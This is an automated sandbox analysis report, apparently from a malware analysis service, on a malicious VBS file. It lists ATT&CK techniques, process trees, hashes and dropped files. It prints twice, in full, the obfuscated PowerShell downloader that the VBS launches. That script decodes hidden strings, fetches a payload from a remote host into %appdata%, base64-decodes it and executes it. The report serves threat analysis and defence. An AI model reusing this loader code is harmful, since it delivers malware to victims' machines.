5eddfcfbde12dfd59c1ddd866546c9604f392d350ebc83a0ef58f5026e4fea4d

Analysis

max time kernel
126s
max time network
132s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
20-11-2024 18:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs
Size

132KB
MD5

3b613b81a9d2bfb9ee156ff4f3e03a93
SHA1

8364c6919db9ecf241af281d380d464dc59c84ba
SHA256

8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998
SHA512

cab65db7ff1ef2f743b68e4aec31c1d6ed000172510ed0d9f57d7a4d44dbaf26844bcf353537fdc4a71ad90a48ad60d4058fa25679e52649071079da56ca8d7f
SSDEEP

3072:fwuzkYMPZJqaVBsPHFBktYkCeJ+URvMP/Rj5mk36VYK4qhU4IsMMBlt:f7kYMPZoaVBsPHFBqYkR+URkP/Rj5mj1

Score

8^/10

discovery execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 2840 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2840 powershell.exe
2804 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
6	2840	powershell.exe

pid	process
2840	powershell.exe
2804	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

ping.exeping.exe

pid process

2160 ping.exe
2188 ping.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

ping.exeping.exe

pid process

2160 ping.exe
2188 ping.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

2840 powershell.exe
2804 powershell.exe
2804 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2840 powershell.exe
Token: SeDebugPrivilege 2804 powershell.exe

pid	process
2160	ping.exe
2188	ping.exe

pid	process
2160	ping.exe
2188	ping.exe

pid	process
2840	powershell.exe
2804	powershell.exe
2804	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2840	powershell.exe
Token: SeDebugPrivilege	2804	powershell.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2600 wrote to memory of 2160	2600	WScript.exe	ping.exe
PID 2600 wrote to memory of 2160	2600	WScript.exe	ping.exe
PID 2600 wrote to memory of 2160	2600	WScript.exe	ping.exe
PID 2600 wrote to memory of 2188	2600	WScript.exe	ping.exe
PID 2600 wrote to memory of 2188	2600	WScript.exe	ping.exe
PID 2600 wrote to memory of 2188	2600	WScript.exe	ping.exe
PID 2600 wrote to memory of 2888	2600	WScript.exe	cmd.exe
PID 2600 wrote to memory of 2888	2600	WScript.exe	cmd.exe
PID 2600 wrote to memory of 2888	2600	WScript.exe	cmd.exe
PID 2600 wrote to memory of 2840	2600	WScript.exe	powershell.exe
PID 2600 wrote to memory of 2840	2600	WScript.exe	powershell.exe
PID 2600 wrote to memory of 2840	2600	WScript.exe	powershell.exe
PID 2840 wrote to memory of 2704	2840	powershell.exe	cmd.exe
PID 2840 wrote to memory of 2704	2840	powershell.exe	cmd.exe
PID 2840 wrote to memory of 2704	2840	powershell.exe	cmd.exe
PID 2840 wrote to memory of 2804	2840	powershell.exe	powershell.exe
PID 2840 wrote to memory of 2804	2840	powershell.exe	powershell.exe
PID 2840 wrote to memory of 2804	2840	powershell.exe	powershell.exe
PID 2840 wrote to memory of 2804	2840	powershell.exe	powershell.exe
PID 2804 wrote to memory of 2664	2804	powershell.exe	cmd.exe
PID 2804 wrote to memory of 2664	2804	powershell.exe	cmd.exe
PID 2804 wrote to memory of 2664	2804	powershell.exe	cmd.exe
PID 2804 wrote to memory of 2664	2804	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8be322fd5399068e2db918866ec0011882c308226f9c8065df643dbcd4d7e998.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2600
- C:\Windows\System32\ping.exe
  ping google.com -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2160
- C:\Windows\System32\ping.exe
  ping %.%.%.%
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:2188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c dir
  2⤵
  PID:2888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$graanes = 1;Function Steatolytic($Feltsengenes){$Procereal=$Feltsengenes.Length-$graanes;$Bagger='Substring';For( $Enligtstilledes=5;$Enligtstilledes -lt $Procereal;$Enligtstilledes+=6){$Uncleanlily164+=$Feltsengenes.$Bagger.Invoke( $Enligtstilledes, $graanes);}$Uncleanlily164;}function schlepper($Lamond){ . ($Vittighed) ($Lamond);}$Xenofobi=Steatolytic 'E terMUnabsoFeatuzHeteriBilinl EnkrlNeumaaPigtr/Disco5M.xop. Taxo0 .dtm Viss (Vi cuWSlu,niLineanSem.edColo,oToptywAn.ets Cham SoreoNRangeTKambr octag1 Abol0Slaae.Tughr0Dispa;wiene gypp,W TeapiSlavenGramm6 T si4Dyarc;Ab,li Strogx Boo 6Pricy4S aln;Teach Fo osromkvdv roo:C,ino1 Non.2horke1Spytk.Acc,d0Deoxi)Natur TredvGShelleLibr c rustkMarmooMonod/Indkb2Assem0Cytod1,rykk0Digit0 Fors1Ma,le0Exten1Count uftkFPer.giFejlsrNedtre.rrelfteughoGel,txPangs/.ekru1An dy2Ragou1 rape.Arres0 Se,s ';$Dingdong=Steatolytic 'QuizmUCirk sIronsedruknrunipe-Uni.pAInyokgTritiePock,ntartatAplit ';$Externalism=Steatolytic 'MorgahRe iot.ssemtRecurpFortr:acrop/ Bl,d/RotorwDetaiw.opulw Jagt.YngleeLivsvnHe.ereSquirrUnderg SubtyPrecr-OpdrtsCra ne abesrAnativSnuse.An iarEgal.oMamba/ClaviGSpotseante,nDi etf s ksoPurprrAntite Re lnChe.kiKastsnAutorg laresU,enl.Bivu,d TainwPaa.rpMidtv ';$Underbeak=Steatolytic 'aw le>Veder ';$Vittighed=Steatolytic 'overaiDistre,omanxSc,th ';$Bibeholdelsernes='Skolelreren';$Klediskenes = Steatolytic '.etapeGartncrhinsh HjdeoFaris Mult%,orbiaKababpSpottpSpathdconchaScofft Mu iaP eud%fort.\ StilMSrsk a BlgegFuelstPerisknut,aa CrypmNonstpPeasaeAmerinOvoges Fi.m. AlleBH,rseiThi,tbMids. Besv & Kede&Mohik StabeeUnnumc IrrehApopho Regl BikortUpway ';schlepper (Steatolytic 'Gifte$MylohgLoghelPolteovizorbSki maOpercl Bams:Fet.cSTyperq AbseuConnea Homim Avan=H ndy(DupskcInd.mmR dredInte perig/ R cicBr.ss Se.ge$DiffeKFagl.lFrosteTopf dUnreai R susUnderk HuggeRejecn repreUnc rs,rgan) Empo ');schlepper (Steatolytic 'Rdgr,$Ab,trgMgbunl KomtoFiskebgravlaCarmel Indl: GlosCUrsoluSiouxrMestraStilttM scei lottcBouga2 Topn3Dia,o2 Bram=Ecdys$sv.psEMyr,ex BeritPre,geAnsigrCa lenI,peta.orrelAndetiHenvesPytonmMono..EnshasAntagp spedlUdtydiOverptStu p(Elapi$HeterUUnrewnHferhd .kskePipi.rBedlab SetieProkua NonlkFejlb)Demur ');$Externalism=$Curatic232[0];$Coenenchym= (Steatolytic 'Fiske$Pol,cgskadelEloigo Fiskb P,liaIs,aml Vrdi:DiskeTNedslhSca ieBoehmr,lowheFattib.otizyale t=SuperNBiklaeTreatwTropi-VidenONontebenth jGennee GenncbefoltEta.r EfterSGavlhyVandks GunltL.xineLik,imAndel.InopeNKotoweS.ppotPosta.So,teW IsoceGrandbSupp,CFor al,lassi .miteundernBor.rt');$Coenenchym+=$Squam[1];schlepper ($Coenenchym);schlepper (Steatolytic ' ondo$InvenTVehefh udeneTur.erPsycheWithobOstomyMa,tr.scariH PhyteUnbeaaPatted KofieHydrorPsychsprota[Briar$AlloxDImpl i TrionLysn,gobligdDarnso Tou nAvifagAntic]Damga= etag$SekteXErbiue TabunIllibouroenfH,poto BrdebBl,nniRaci, ');$Pedicellated159=Steatolytic 'Skrmf$ andTPreaghSkurke Fal.r nemoeStipubArbejy Unav. PsycDsemisoProblwJertfnS ddel Stifo Udsia,eridd armhF MyosiElsinlA.tage Ef e(Presc$Hu.riEfejlbxContrt ShyleHe errO letn RealaPosselSilkei Ne,fsRekvimMidwe,Seko,$SteepS Vi,lpEndopiRek,lr Re,siBe,tytR arhuDyrskaRetablNo maiMasc.sNondymAdv neThore)tinge ';$Spiritualisme=$Squam[0];schlepper (Steatolytic 'kursu$Resulg F.gelUnsphoDigitbUnchraArbejlSpad,:Le.onbVildsr Emunn Capie Truss Benzi amshkAadkorMarkeivarslnUndergAcupue Aut,rUbnhrsGutli=w ndf(Allo,T KonteBuk esLgesttFinge-skidtP.udgeaTeksttTermihMal r Lydse$ReparSA,onnpVidneiRegisrUnd,liPadout Na buMultia turdl OveriCar isStenkm.ordyeIntri)Serbo ');while (!$brnesikringers) {schlepper (Steatolytic 'hospi$Dr.kngMedlilVicksoPladsbkv tuaPakkelReass: atwaVTrut.aAntigrgangee AnaldScop e Forek Rekll insuaArticrBrefre Rubbrfng,eeCobbltForma=Delin$Undert Mis,r Fedtu Lokae Udfo ') ;schlepper $Pedicellated159;schlepper (Steatolytic 'In drSRek at Ved.a .ndlr OdietNewsb-C,labSUdsanlJagtgeChurle.natopChrys onyun4Ungar ');schlepper (Steatolytic 'Hu,dr$Trio.g HeadlUniveoBu heb S.lea Hovelaustr: A,phbCeratrtheolnAtla e OutbsSawb iCampakTark,rSemiciEncrynPokingHybrieLindrrEndots vrms=Nulst( BeskT VolueReg,esPaa,gt Bemo-AneroP FyrsaPhan.tg idehGevan Overs$KnudeSK mmepatmosiTaraxrSewariForsktakvaruSettoaIlluslBes,riSwiwesForammNe,coe Eve.)Ti ba ') ;schlepper (Steatolytic 'Cry,t$Vehefg S mil viceoSplitbGentlaContol.ikle:Lea hSBoligaMletstUnbela rivanHavebi Lu.usGr ene Wa s4Frisk6End c=Li do$,orttgMve,rl Spe oSydhabopdaga.denolbelgn:trundAA.tiedGe.neoLegetpPosnitAntiaa In.enPeroxtSotree M larPro,usPreva+missi+ B tt%Ku an$PeculCGena,uKlni,rSu,cea,utiltUnraniUdhvncVse t2Ge,ni3Una n2Progr.S inncUltraoTikrou Aemin Unfit Pore ') ;$Externalism=$Curatic232[$Satanise46];}$Fangerne115=311650;$Uomtvisteligheds=29747;schlepper (Steatolytic 'R mot$overrgFril.lAccumoSubchbForbiaRebe l Conc:brakvL Mis aRewets S.bct Sheve.mblyeElephv R ssnP ojee resasU eal Forda= Si k PeploG Roste CytotYarne-Th.spCErhveoSte.gnB.vaatMajbreKorrin Box,t Mis, H per$ServiS vandp Bas.iLuddir BlaniHnsehtFr lauOver,aH,urel.mpaliVanrysbran mCardieK ntr ');schlepper (Steatolytic 'P ran$Zy,otgScabblBeaucovaterbBundpaDi talKva,r:SarcoB JubheSlgtss,lumevLiviaiLobatmSkylde StaglSpasmsAculeeD fenrAppernMat.reFourqsTeuto lsr,v=Rasal Epita[ KrseSblirry ilssFe.lhtStetie G usmKirtl. epi.CRespioRdkaanTiaarvSansee bdigrwoo.htPens,]Prefa:U.raa:O onnFEfte rCostmoOeretmBes.fBAugusaChlorsBal,ieDioti6Paask4Ch.ssSM,cketOlympr s opiHjlp nForurg Acco( Pol.$Sj,skL Gruna MgfasFlgett BraneHovedeSekt v illenUnelaeeuropsTypon)s.ept ');schlepper (Steatolytic 'Ln um$ thyrgFontnl.lfbjoFran bTerr.aSportlNumer:Unde,B .verrDefacuSprinnForels No,atE.uats Enke Vaing=udsky Chlam[QuiddSInterySkolisD.velt ,ksee .yncmKleri.,abulT Svider,visxPuncttKlods.NemerED mstnReunicArbejoQuizddBoeo.i Peain Jyllgunque]Mitvo: Cook:SikkeA L,diSAnlbeCHudd IKatniIAlim .Sk,abG craceEnfratAl.unSReb.lt muz.r Hapli NonsnQuippgOutwi(Al.oi$.pfinBFortreFrag sV,rguvMonetiZap emCon teHovm l wordsFejlve ersrLasednDrmmeeSmrkesHisp,)Pat.i ');schlepper (Steatolytic ' Danc$ Crusg.ragelXylofo Te,rbsch,haPeritlAnari:Rad.oAFladerS.ytsbKi oreIncomjD,pind FitzsVa,mef EfteeJord.lConv tFremtePa,sarElber=ned.a$ StifBUdbygrPlaceuSunsmnphlo sC erctUdvlgsOrbit.pebblsUd kuuMlejebTem,usStockt AmilrHnsegiGall,nStan,gRefug(Jinji$Pais,FEightaMisfon.ummegC,rtie UnsorPendlnKer he e ra1L nge1Aflaa5Siksa, D,ti$ScorcUEleuto .nspmBrygmtRi,sfvU imeiMyldrsBechatdi areStililSkr.aiMe.afg .uenhAfpreeThreadUnjags Plan)Efter ');schlepper $Arbejdsfelter;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2840
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magtkampens.Bib && echo t"
    3⤵
    PID:2704
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$graanes = 1;Function Steatolytic($Feltsengenes){$Procereal=$Feltsengenes.Length-$graanes;$Bagger='Substring';For( $Enligtstilledes=5;$Enligtstilledes -lt $Procereal;$Enligtstilledes+=6){$Uncleanlily164+=$Feltsengenes.$Bagger.Invoke( $Enligtstilledes, $graanes);}$Uncleanlily164;}function schlepper($Lamond){ . ($Vittighed) ($Lamond);}$Xenofobi=Steatolytic 'E terMUnabsoFeatuzHeteriBilinl EnkrlNeumaaPigtr/Disco5M.xop. Taxo0 .dtm Viss (Vi cuWSlu,niLineanSem.edColo,oToptywAn.ets Cham SoreoNRangeTKambr octag1 Abol0Slaae.Tughr0Dispa;wiene gypp,W TeapiSlavenGramm6 T si4Dyarc;Ab,li Strogx Boo 6Pricy4S aln;Teach Fo osromkvdv roo:C,ino1 Non.2horke1Spytk.Acc,d0Deoxi)Natur TredvGShelleLibr c rustkMarmooMonod/Indkb2Assem0Cytod1,rykk0Digit0 Fors1Ma,le0Exten1Count uftkFPer.giFejlsrNedtre.rrelfteughoGel,txPangs/.ekru1An dy2Ragou1 rape.Arres0 Se,s ';$Dingdong=Steatolytic 'QuizmUCirk sIronsedruknrunipe-Uni.pAInyokgTritiePock,ntartatAplit ';$Externalism=Steatolytic 'MorgahRe iot.ssemtRecurpFortr:acrop/ Bl,d/RotorwDetaiw.opulw Jagt.YngleeLivsvnHe.ereSquirrUnderg SubtyPrecr-OpdrtsCra ne abesrAnativSnuse.An iarEgal.oMamba/ClaviGSpotseante,nDi etf s ksoPurprrAntite Re lnChe.kiKastsnAutorg laresU,enl.Bivu,d TainwPaa.rpMidtv ';$Underbeak=Steatolytic 'aw le>Veder ';$Vittighed=Steatolytic 'overaiDistre,omanxSc,th ';$Bibeholdelsernes='Skolelreren';$Klediskenes = Steatolytic '.etapeGartncrhinsh HjdeoFaris Mult%,orbiaKababpSpottpSpathdconchaScofft Mu iaP eud%fort.\ StilMSrsk a BlgegFuelstPerisknut,aa CrypmNonstpPeasaeAmerinOvoges Fi.m. AlleBH,rseiThi,tbMids. Besv & Kede&Mohik StabeeUnnumc IrrehApopho Regl BikortUpway ';schlepper (Steatolytic 'Gifte$MylohgLoghelPolteovizorbSki maOpercl Bams:Fet.cSTyperq AbseuConnea Homim Avan=H ndy(DupskcInd.mmR dredInte perig/ R cicBr.ss Se.ge$DiffeKFagl.lFrosteTopf dUnreai R susUnderk HuggeRejecn repreUnc rs,rgan) Empo ');schlepper (Steatolytic 'Rdgr,$Ab,trgMgbunl KomtoFiskebgravlaCarmel Indl: GlosCUrsoluSiouxrMestraStilttM scei lottcBouga2 Topn3Dia,o2 Bram=Ecdys$sv.psEMyr,ex BeritPre,geAnsigrCa lenI,peta.orrelAndetiHenvesPytonmMono..EnshasAntagp spedlUdtydiOverptStu p(Elapi$HeterUUnrewnHferhd .kskePipi.rBedlab SetieProkua NonlkFejlb)Demur ');$Externalism=$Curatic232[0];$Coenenchym= (Steatolytic 'Fiske$Pol,cgskadelEloigo Fiskb P,liaIs,aml Vrdi:DiskeTNedslhSca ieBoehmr,lowheFattib.otizyale t=SuperNBiklaeTreatwTropi-VidenONontebenth jGennee GenncbefoltEta.r EfterSGavlhyVandks GunltL.xineLik,imAndel.InopeNKotoweS.ppotPosta.So,teW IsoceGrandbSupp,CFor al,lassi .miteundernBor.rt');$Coenenchym+=$Squam[1];schlepper ($Coenenchym);schlepper (Steatolytic ' ondo$InvenTVehefh udeneTur.erPsycheWithobOstomyMa,tr.scariH PhyteUnbeaaPatted KofieHydrorPsychsprota[Briar$AlloxDImpl i TrionLysn,gobligdDarnso Tou nAvifagAntic]Damga= etag$SekteXErbiue TabunIllibouroenfH,poto BrdebBl,nniRaci, ');$Pedicellated159=Steatolytic 'Skrmf$ andTPreaghSkurke Fal.r nemoeStipubArbejy Unav. PsycDsemisoProblwJertfnS ddel Stifo Udsia,eridd armhF MyosiElsinlA.tage Ef e(Presc$Hu.riEfejlbxContrt ShyleHe errO letn RealaPosselSilkei Ne,fsRekvimMidwe,Seko,$SteepS Vi,lpEndopiRek,lr Re,siBe,tytR arhuDyrskaRetablNo maiMasc.sNondymAdv neThore)tinge ';$Spiritualisme=$Squam[0];schlepper (Steatolytic 'kursu$Resulg F.gelUnsphoDigitbUnchraArbejlSpad,:Le.onbVildsr Emunn Capie Truss Benzi amshkAadkorMarkeivarslnUndergAcupue Aut,rUbnhrsGutli=w ndf(Allo,T KonteBuk esLgesttFinge-skidtP.udgeaTeksttTermihMal r Lydse$ReparSA,onnpVidneiRegisrUnd,liPadout Na buMultia turdl OveriCar isStenkm.ordyeIntri)Serbo ');while (!$brnesikringers) {schlepper (Steatolytic 'hospi$Dr.kngMedlilVicksoPladsbkv tuaPakkelReass: atwaVTrut.aAntigrgangee AnaldScop e Forek Rekll insuaArticrBrefre Rubbrfng,eeCobbltForma=Delin$Undert Mis,r Fedtu Lokae Udfo ') ;schlepper $Pedicellated159;schlepper (Steatolytic 'In drSRek at Ved.a .ndlr OdietNewsb-C,labSUdsanlJagtgeChurle.natopChrys onyun4Ungar ');schlepper (Steatolytic 'Hu,dr$Trio.g HeadlUniveoBu heb S.lea Hovelaustr: A,phbCeratrtheolnAtla e OutbsSawb iCampakTark,rSemiciEncrynPokingHybrieLindrrEndots vrms=Nulst( BeskT VolueReg,esPaa,gt Bemo-AneroP FyrsaPhan.tg idehGevan Overs$KnudeSK mmepatmosiTaraxrSewariForsktakvaruSettoaIlluslBes,riSwiwesForammNe,coe Eve.)Ti ba ') ;schlepper (Steatolytic 'Cry,t$Vehefg S mil viceoSplitbGentlaContol.ikle:Lea hSBoligaMletstUnbela rivanHavebi Lu.usGr ene Wa s4Frisk6End c=Li do$,orttgMve,rl Spe oSydhabopdaga.denolbelgn:trundAA.tiedGe.neoLegetpPosnitAntiaa In.enPeroxtSotree M larPro,usPreva+missi+ B tt%Ku an$PeculCGena,uKlni,rSu,cea,utiltUnraniUdhvncVse t2Ge,ni3Una n2Progr.S inncUltraoTikrou Aemin Unfit Pore ') ;$Externalism=$Curatic232[$Satanise46];}$Fangerne115=311650;$Uomtvisteligheds=29747;schlepper (Steatolytic 'R mot$overrgFril.lAccumoSubchbForbiaRebe l Conc:brakvL Mis aRewets S.bct Sheve.mblyeElephv R ssnP ojee resasU eal Forda= Si k PeploG Roste CytotYarne-Th.spCErhveoSte.gnB.vaatMajbreKorrin Box,t Mis, H per$ServiS vandp Bas.iLuddir BlaniHnsehtFr lauOver,aH,urel.mpaliVanrysbran mCardieK ntr ');schlepper (Steatolytic 'P ran$Zy,otgScabblBeaucovaterbBundpaDi talKva,r:SarcoB JubheSlgtss,lumevLiviaiLobatmSkylde StaglSpasmsAculeeD fenrAppernMat.reFourqsTeuto lsr,v=Rasal Epita[ KrseSblirry ilssFe.lhtStetie G usmKirtl. epi.CRespioRdkaanTiaarvSansee bdigrwoo.htPens,]Prefa:U.raa:O onnFEfte rCostmoOeretmBes.fBAugusaChlorsBal,ieDioti6Paask4Ch.ssSM,cketOlympr s opiHjlp nForurg Acco( Pol.$Sj,skL Gruna MgfasFlgett BraneHovedeSekt v illenUnelaeeuropsTypon)s.ept ');schlepper (Steatolytic 'Ln um$ thyrgFontnl.lfbjoFran bTerr.aSportlNumer:Unde,B .verrDefacuSprinnForels No,atE.uats Enke Vaing=udsky Chlam[QuiddSInterySkolisD.velt ,ksee .yncmKleri.,abulT Svider,visxPuncttKlods.NemerED mstnReunicArbejoQuizddBoeo.i Peain Jyllgunque]Mitvo: Cook:SikkeA L,diSAnlbeCHudd IKatniIAlim .Sk,abG craceEnfratAl.unSReb.lt muz.r Hapli NonsnQuippgOutwi(Al.oi$.pfinBFortreFrag sV,rguvMonetiZap emCon teHovm l wordsFejlve ersrLasednDrmmeeSmrkesHisp,)Pat.i ');schlepper (Steatolytic ' Danc$ Crusg.ragelXylofo Te,rbsch,haPeritlAnari:Rad.oAFladerS.ytsbKi oreIncomjD,pind FitzsVa,mef EfteeJord.lConv tFremtePa,sarElber=ned.a$ StifBUdbygrPlaceuSunsmnphlo sC erctUdvlgsOrbit.pebblsUd kuuMlejebTem,usStockt AmilrHnsegiGall,nStan,gRefug(Jinji$Pais,FEightaMisfon.ummegC,rtie UnsorPendlnKer he e ra1L nge1Aflaa5Siksa, D,ti$ScorcUEleuto .nspmBrygmtRi,sfvU imeiMyldrsBechatdi areStililSkr.aiMe.afg .uenhAfpreeThreadUnjags Plan)Efter ');schlepper $Arbejdsfelter;"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magtkampens.Bib && echo t"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Magtkampens.Bib

Filesize
444KB

MD5
8dd5eb68685e339e1651cbeefd0b235f

SHA1
cef3800a21bf4b8142333629fe685d1107c1ffa5

SHA256
5cf4b171cfc0ad5166bc8be93b41bcebe53aa1c1194a054271201dcbe48c84d1

SHA512
83d40812894f1fc3d03aca47686776fc6361a1fa52fe2f11ef22c2952c6b65d7422c34b47cbd61d37e77a3048358de2ee3ffc3ab67990d15abf3ca71c8d55b97

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B1OV4B2N0I250XZM9KHX.temp

Filesize
7KB

MD5
182295c18c3a9995f3b25fc6d9d78447

SHA1
65fe1c23b4e00e0af664588fba5ad803bb93bb9b

SHA256
0587b01d956db7779222463685fc55b6a0be90d26fdbc218df826546f366ef9c

SHA512
9e44e2178e9075ba4f74a270350e56e05f65c3128949c2496070015c68bfdb207be9fda381b5f6fc140dbfc844797f1974595edee0215a20b1b1692a528d4cb0

Download Submit
memory/2804-13-0x00000000062A0000-0x000000000872B000-memory.dmp

Filesize
36.5MB

Download
memory/2840-4-0x0000000002440000-0x00000000024C0000-memory.dmp

Filesize
512KB

Download
memory/2840-5-0x000000001B190000-0x000000001B472000-memory.dmp

Filesize
2.9MB

Download
memory/2840-6-0x00000000026F0000-0x00000000026F8000-memory.dmp

Filesize
32KB

Download
memory/2840-11-0x0000000002440000-0x00000000024C0000-memory.dmp

Filesize
512KB

Download